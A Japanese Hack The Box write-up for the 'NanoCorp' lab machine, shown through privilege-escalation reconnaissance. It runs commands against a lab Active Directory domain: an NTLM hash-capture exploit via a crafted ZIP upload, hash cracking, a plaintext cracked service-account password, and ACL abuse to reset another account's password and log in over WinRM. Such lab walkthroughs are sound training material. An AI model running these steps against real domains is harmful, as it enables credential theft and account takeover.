初めに
本記事は Hack The Box(以下リンク参照) の「NanoCorp」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(kali㉿kali)-[~/Desktop]
└─$ rustscan -a 10.10.11.93 --top
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.93:88
Open 10.10.11.93:80
Open 10.10.11.93:135
Open 10.10.11.93:139
Open 10.10.11.93:389
Open 10.10.11.93:445
Open 10.10.11.93:464
Open 10.10.11.93:53
Open 10.10.11.93:593
Open 10.10.11.93:636
Open 10.10.11.93:3268
Open 10.10.11.93:3269
Open 10.10.11.93:5986
Open 10.10.11.93:9389
Open 10.10.11.93:49664
Open 10.10.11.93:49668
Open 10.10.11.93:51600
Open 10.10.11.93:51605
Open 10.10.11.93:51627
Open 10.10.11.93:59875
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 08:00 EST
Initiating Ping Scan at 08:00
Scanning 10.10.11.93 [4 ports]
Completed Ping Scan at 08:00, 0.35s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 08:00
Scanning DC01.nanocorp.htb (10.10.11.93) [20 ports]
Discovered open port 135/tcp on 10.10.11.93
Discovered open port 445/tcp on 10.10.11.93
Discovered open port 80/tcp on 10.10.11.93
Discovered open port 139/tcp on 10.10.11.93
Discovered open port 51627/tcp on 10.10.11.93
Discovered open port 636/tcp on 10.10.11.93
Discovered open port 53/tcp on 10.10.11.93
Discovered open port 49668/tcp on 10.10.11.93
Discovered open port 3269/tcp on 10.10.11.93
Discovered open port 51600/tcp on 10.10.11.93
Discovered open port 51605/tcp on 10.10.11.93
Discovered open port 3268/tcp on 10.10.11.93
Discovered open port 59875/tcp on 10.10.11.93
Discovered open port 389/tcp on 10.10.11.93
Discovered open port 593/tcp on 10.10.11.93
Discovered open port 5986/tcp on 10.10.11.93
Discovered open port 49664/tcp on 10.10.11.93
Discovered open port 88/tcp on 10.10.11.93
Discovered open port 9389/tcp on 10.10.11.93
Discovered open port 464/tcp on 10.10.11.93
Completed SYN Stealth Scan at 08:00, 0.88s elapsed (20 total ports)
Nmap scan report for DC01.nanocorp.htb (10.10.11.93)
Host is up, received echo-reply ttl 127 (0.55s latency).
Scanned at 2025-11-15 08:00:13 EST for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
51600/tcp open unknown syn-ack ttl 127
51605/tcp open unknown syn-ack ttl 127
51627/tcp open unknown syn-ack ttl 127
59875/tcp open unknown syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.35 seconds
Raw packets sent: 24 (1.032KB) | Rcvd: 78 (15.072KB)
WindowsのPortが開いている。AD環境ぽい。
ドメイン情報収集
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p 389 -n -Pn --script ldap-rootdse 10.10.11.93
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-15 07:56 EST
Nmap scan report for 10.10.11.93
Host is up (0.55s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=nanocorp,DC=htb
| ldapServiceName: nanocorp.htb:dc01$@NANOCORP.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=nanocorp,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
| namingContexts: DC=nanocorp,DC=htb
| namingContexts: CN=Configuration,DC=nanocorp,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=nanocorp,DC=htb
| namingContexts: DC=DomainDnsZones,DC=nanocorp,DC=htb
| namingContexts: DC=ForestDnsZones,DC=nanocorp,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 168300
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=nanocorp,DC=htb
| dnsHostName: DC01.nanocorp.htb
| defaultNamingContext: DC=nanocorp,DC=htb
| currentTime: 20251115195659.0Z
|_ configurationNamingContext: CN=Configuration,DC=nanocorp,DC=htb
Service Info: Host: DC01; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
nanocorp.htbのドメイン情報を掴むことが出来た。この情報を/etc/hostsに以下のように登録しておく。
10.10.11.93 nanocorp.htb
今回はクレデンシャルを渡す感じのものではなかったので初期侵入は難しそうね。
SMB列挙
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L \\\\10.10.11.93
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.93 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
特段なさそう。
Web列挙
HTTPのポートが開いてたので見てみる

ほうほう。Whatwebでも見ておきますか。
┌──(kali㉿kali)-[~/Desktop/WhatWeb]
└─$ ./whatweb -v http://nanocorp.htb
WhatWeb report for http://nanocorp.htb
Status : 200 OK
Title : Nanocorp
IP : 10.10.11.93
Country : RESERVED, ZZ
Summary : Apache[2.4.58], Bootstrap, HTML5, HTTPServer[Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12], JQuery, OpenSSL[3.1.3], PHP[8.2.12], Script
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.58 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ OpenSSL ]
The OpenSSL Project is a collaborative effort to develop a
robust, commercial-grade, full-featured, and Open Source
toolkit implementing the Secure Sockets Layer (SSL v2/v3)
and Transport Layer Security (TLS v1) protocols as well as
a full-strength general purpose cryptography library.
Version : 3.1.3
Website : http://www.openssl.org/
[ PHP ]
PHP is a widely-used general-purpose scripting language
that is especially suited for Web development and can be
embedded into HTML. This plugin identifies PHP errors,
modules and versions and extracts the local file path and
username if present.
Version : 8.2.12
Google Dorks: (3)
Website : http://www.php.net/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 15 Nov 2025 20:06:10 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 10 Apr 2025 06:27:08 GMT
ETag: "3f54-63266acdf17c3"
Accept-Ranges: bytes
Content-Length: 16212
Connection: close
Content-Type: text/html
特段気になるものはない。katanaでも見ておく。
┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://nanocorp.htb
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/
projectdiscovery.io
[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://nanocorp.htb
http://nanocorp.htb
なさそう。
サブドメイン列挙
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://nanocorp.htb -H "Host: FUZZ.nanocorp.htb" -fc 301 -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://nanocorp.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.nanocorp.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 301
________________________________________________
hire [Status: 200, Size: 2520, Words: 646, Lines: 68, Duration: 3368ms]
:: Progress: [100000/100000] :: Job [1/1] :: 79 req/sec :: Duration: [0:14:58] :: Errors: 1478 ::
ディレクトリ探索
このサイトを探ってみる。
┌──(kali㉿kali)-[~/Desktop]
└─$ dirsearch -u http://hire.nanocorp.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/Desktop/reports/http_hire.nanocorp.htb/_25-11-15_08-17-27.txt
Target: http://hire.nanocorp.htb/
[08:17:27] Starting:
[08:17:38] 403 - 306B - /%3f/
[08:17:38] 403 - 306B - /%C0%AE%C0%AE%C0%AF
[08:17:39] 403 - 306B - /%ff
[08:18:14] 403 - 306B - /.htaccess.orig
[08:18:14] 403 - 306B - /.htaccess_extra
[08:18:14] 403 - 306B - /.htaccessBAK
[08:18:14] 403 - 306B - /.htaccess_sc
[08:18:14] 403 - 306B - /.htaccess.save
[08:18:14] 403 - 306B - /.htaccess_orig
[08:18:14] 403 - 306B - /.htaccess.sample
[08:18:14] 403 - 306B - /.htaccess.bak1
[08:18:14] 403 - 306B - /.ht_wsr.txt
[08:18:14] 403 - 306B - /.htaccessOLD2
[08:18:14] 403 - 306B - /.htaccessOLD
[08:18:14] 403 - 306B - /.htm
[08:18:14] 403 - 306B - /.httr-oauth
[08:18:14] 403 - 306B - /.htpasswd_test
[08:18:15] 403 - 306B - /.htpasswds
[08:18:15] 403 - 306B - /.html
[08:20:35] 301 - 347B - /assets -> http://hire.nanocorp.htb/assets/
[08:20:36] 200 - 984B - /assets/
[08:20:59] 403 - 306B - /cgi-bin/
[08:21:02] 500 - 647B - /cgi-bin/printenv.pl
[08:22:02] 503 - 406B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[08:22:02] 503 - 406B - /examples/servlets/servlet/RequestHeaderExample
[08:22:03] 503 - 406B - /examples/websocket/index.xhtml
[08:22:03] 503 - 406B - /examples/jsp/snp/snoop.jsp
[08:22:03] 503 - 406B - /examples/
[08:22:03] 503 - 406B - /examples/servlet/SnoopServlet
[08:22:03] 503 - 406B - /examples/servlets/index.html
[08:22:03] 503 - 406B - /examples/jsp/index.html
[08:22:03] 503 - 406B - /examples
[08:22:03] 503 - 406B - /examples/servlets/servlet/CookieExample
[08:22:23] 200 - 992B - /images/
[08:22:23] 301 - 347B - /images -> http://hire.nanocorp.htb/images/
[08:22:26] 403 - 306B - /index.php::$DATA
[08:24:01] 403 - 306B - /phpmyadmin
[08:24:12] 403 - 306B - /phpmyadmin/
[08:24:13] 403 - 306B - /phpmyadmin/docs/html/index.html
[08:24:13] 403 - 306B - /phpmyadmin/doc/html/index.html
[08:24:13] 403 - 306B - /phpmyadmin/ChangeLog
[08:24:13] 403 - 306B - /phpmyadmin/phpmyadmin/index.php
[08:24:13] 403 - 306B - /phpmyadmin/index.php
[08:24:13] 403 - 306B - /phpmyadmin/scripts/setup.php
[08:24:13] 403 - 306B - /phpmyadmin/README
[08:24:35] 403 - 425B - /server-info
[08:24:35] 403 - 425B - /server-status
[08:24:35] 403 - 425B - /server-status/
[08:25:56] 403 - 306B - /Trace.axd::$DATA
[08:26:01] 403 - 306B - /uploads/
[08:26:01] 403 - 306B - /uploads
[08:26:01] 403 - 306B - /uploads/affwp-debug.log
[08:26:01] 403 - 306B - /uploads/dump.sql
[08:26:02] 200 - 0B - /upload.php
[08:26:11] 403 - 306B - /web.config::$DATA
[08:26:12] 403 - 306B - /webalizer
[08:26:12] 403 - 306B - /webalizer/
Task Completed
┌──(kali㉿kali)-[~/Desktop]
└─$ katana -u http://hire.nanocorp.htb
__ __
/ /_____ _/ /____ ____ ___ _
/ '_/ _ / __/ _ / _ \/ _ /
/_/\_\\_,_/\__/\_,_/_//_/\_,_/
projectdiscovery.io
[INF] Current katana version v1.1.2 (outdated)
[INF] Started standard crawling for => http://hire.nanocorp.htb
http://hire.nanocorp.htb
uploads階層があるので適当にアップしてみる。

アクセスはできなさそう。ただ管理者がレジュメ確認するみたいなこと言ってたのでフィッシング系のイニシャルアクセスかな?と予想。
イニシャルアクセス
最近ZIPからのExplorer系の脆弱性あった気もするなと思ったので適当にCVE見てみたらあった。
ここらへんは肌間で探ればいい気がする。
CVE-2025-24071
Net-NTLMv2のハッシュを搾取できそうなPOCがあったので利用してみる。
┌──(kali㉿kali)-[~/Desktop]
└─$ python poc.py
Enter your file name: exploit
Enter IP (EX: 192.168.1.162): 10.10.14.6
completed
適当にアップしてみる。

以下でハッシュが来るのを待ち受ける。
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo responder -I tun0
アップして暫くするとハッシュが返ってくる。
このハッシュをHashcatで解析する。
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt -r /usr/share/john/rules/best64.rule --force
横展開
ドメイン列挙
ドメインユーザ見つければこっちのもんよ。まずはSMBだな。
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --shares
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -M gpp_password
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
GPP_PASS... 10.10.11.93 445 DC01 [+] Found SYSVOL share
GPP_PASS... 10.10.11.93 445 DC01 [*] Searching for potential XML files containing passwords
SMB 10.10.11.93 445 DC01 [*] Started spidering
SMB 10.10.11.93 445 DC01 [*] Spidering .
SMB 10.10.11.93 445 DC01 [*] Done spidering (Completed in 16.31669807434082)
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -M gpp_autologin
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
SMB 10.10.11.93 445 DC01 [*] Enumerated shares
SMB 10.10.11.93 445 DC01 Share Permissions Remark
SMB 10.10.11.93 445 DC01 ----- ----------- ------
SMB 10.10.11.93 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.93 445 DC01 C$ Default share
SMB 10.10.11.93 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.93 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.93 445 DC01 SYSVOL READ Logon server share
GPP_AUTO... 10.10.11.93 445 DC01 [+] Found SYSVOL share
GPP_AUTO... 10.10.11.93 445 DC01 [*] Searching for Registry.xml
SMB 10.10.11.93 445 DC01 [*] Started spidering
SMB 10.10.11.93 445 DC01 [*] Spidering .
SMB 10.10.11.93 445 DC01 [*] Done spidering (Completed in 17.028249740600586)
面白そうなの無いや。んじゃAD侵害の基本的な奴回しておくか。
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --asreproast asreproast2.out
LDAP 10.10.11.93 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP 10.10.11.93 389 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
LDAP 10.10.11.93 389 DC01 No entries found!
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --kerberoasting kerberoasting.out
LDAP 10.10.11.93 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP 10.10.11.93 389 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
LDAP 10.10.11.93 389 DC01 [*] Skipping disabled account: krbtgt
LDAP 10.10.11.93 389 DC01 [*] Total of records returned 0
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc ldap dc01.nanocorp.htb -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb --password-not-required
LDAP 10.10.11.93 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:nanocorp.htb)
LDAP 10.10.11.93 389 DC01 [+] nanocorp.htb\WEB_SVC:dksehdgh712!@#
LDAP 10.10.11.93 389 DC01 User: Guest Status: disabled
あんましいいのなさそう。続いてbloodhound取ります。
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-ce-python -c all -u WEB_SVC -p 'dksehdgh712!@#' -d nanocorp.htb -ns 10.10.11.93 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: nanocorp.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.nanocorp.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.nanocorp.htb
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.nanocorp.htb
INFO: Done in 00M 52S
INFO: Compressing output into 20251115093222_bloodhound.zip

MONITORING_SVCを侵害してWinRMへの流れで侵害ルートがみえました。これでUserフラグ辺りまでのルートは見えましたね。
BoodyADでACLをAbuseしていきます。
ACL Abuse
Group Add
えいや!
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodyAD --host 10.10.11.93 -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' add groupMember "IT_SUPPORT" web_svc
[+] web_svc added to IT_SUPPORT
Pass change
そいや!
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodyAD --host 10.10.11.93 -d nanocorp.htb -u web_svc -p 'dksehdgh712!@#' set password MONITORING_SVC 'Password123!'
[+] Password changed successfully!
んじゃアクセスできるか確認します。
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb nanocorp.htb -u MONITORING_SVC -p 'Password123!' -d nanocorp.htb
SMB 10.10.11.93 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:nanocorp.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.93 445 DC01 [-] nanocorp.htb\MONITORING_SVC:Password123! STATUS_ACCOUNT_RESTRICTION
あー、この表示はNTLM認証で入れないやつか、面倒だな。
Kerberos認証でいかないといけなさそう。
WinRMでKerberos認証をするにはrealmのコンフィグ設定入れないといけないので面倒ですが、以下のPythonツールでさらっと作ってくれます。
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo python3 configure_krb5.py nanocorp.htb dc01
後はTGTゲットしてWinRMするだけ。faketimeで時差でのエラーを解消しておきましょう。WinRMツールとしてはevil-winrm-pyが便利です。
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo apt install gcc python3-dev libkrb5-dev krb5-pkinit
┌──(kali㉿kali)-[~/Desktop]
└─$ pipx install evil-winrm-py[kerberos]
Installing to existing venv 'evil-winrm-py'
installed package evil-winrm-py 1.5.0, installed using Python 3.13.9
These apps are now globally available
- evil-winrm-py
- ewp
done! ✨ 🌟 ✨
TGTくださーい!!!
┌──(kali㉿kali)-[~/Desktop]
└─$ faketime -f '+7h' impacket-getTGT nanocorp.htb/MONITORING_SVC:'Password123!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in MONITORING_SVC.ccache
接続させてくんろ

よし!!!勝った!これでユーザフラグゲットだぜ!
特権昇格
情報収集
winPeasとりあえず回します。
evil-winrm-py PS C:\Users\monitoring_svc\Documents> C:\Windows\Temp\winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Learn Cloud Hacking : training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
何もいいのなかったわ。と、ここでweb_svcのUserフォルダがあるのに気が付く。
Sliver経由のRunasCSでこのユーザ権限のShellも取っておくか。
まずはモニターさんのビーコン貰います。

レッツRunas!

あ、このLogonTypeだめなのね、なら直でプロセスから貰います。

シェルもらえたので階層見てみます!
C:\Users\web_svc>tree /F /a
tree /F /a
Folder PATH listing
Volume serial number is 2EB6-7759
C:.
+---3D Objects
+---Contacts
+---Desktop
+---Documents
+---Downloads
+---Favorites
| | Bing.url
| |
| \---Links
+---Links
| Desktop.lnk
| Downloads.lnk
| script_02.ps1
|
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
C:\Users\web_svc>
